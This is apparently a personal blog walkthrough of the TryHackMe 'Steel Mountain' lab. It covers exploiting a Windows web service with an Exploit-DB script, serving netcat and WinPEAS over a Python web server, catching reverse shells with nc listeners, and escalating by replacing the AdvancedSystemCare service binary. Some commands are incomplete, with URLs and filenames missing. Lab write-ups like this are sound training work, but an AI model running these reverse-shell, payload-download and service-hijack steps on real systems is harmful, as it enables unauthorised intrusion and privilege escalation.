TryHackMe: Complete Beginner

Steel Mountain

Things got busy yesterday and I had to push finishing this section off a day. The machine’s new IP address is

Access and Escalation Without Metasploit

The alternate exploit we’re going to run for this is located at /usr/share/exploitdb/exploits/windows/remote/ on Kali Linux. To set this up, we’re going to use a quick-n-dirty Python web server containing a statically-compiled version of netcat. This needs to be running on port 80 for the exploit to work (don’t forget to punch a hole through the firewall for this!).

mkdir 1
cd 1
cp /usr/share/windows-binaries/nc.exe .
curl -O
sudo python3 -m http.server 80

Ready our listener in another terminal. Note that WinPEAS generates a lot of output, so we need to increase TMUX history buffer (set -g history-limit 8192) in order to be able to capture all of it. This needs to be set before creating the window that we’re going to catch our reverse shell in!

nc -lvnp 4444

Copy, setup, and run the exploit!

cp /usr/share/exploitdb/exploits/windows/remote/ .
nano # Change ip_addr and local_port
python2 8080
python2 8080

Once we’re in (the exploit needs to be run twice to work), we need to grab and run winPEASx64.exe from our web server.

powershell -c "Invoke-WebRequest -Uri -OutFile winPEASx64.exe"

Interestingly, while WinPEAS notes that ASCServie.exe is vulnerable to an overwrite, it looks like it misses the fact that the compromised user can restart it. That said, WinPEAS does display a lot more information than PowerUp, so it might be useful to run both

Useful PowerShell commands:

Putting this all together, we can replicate yesterday’s compromise by:

powershell -c "Invoke-WebRequest -Uri -OutFile ASCService.exe"
sc.exe stop AdvancedSystemCareService9
copy "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
copy /Y ASCService.exe
	"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
sc.exe start AdvancedSystemCareService9

Where ASCService.exe is the same compromise as last time, and we again catch the reverse shell using:

nc -lvnp 4443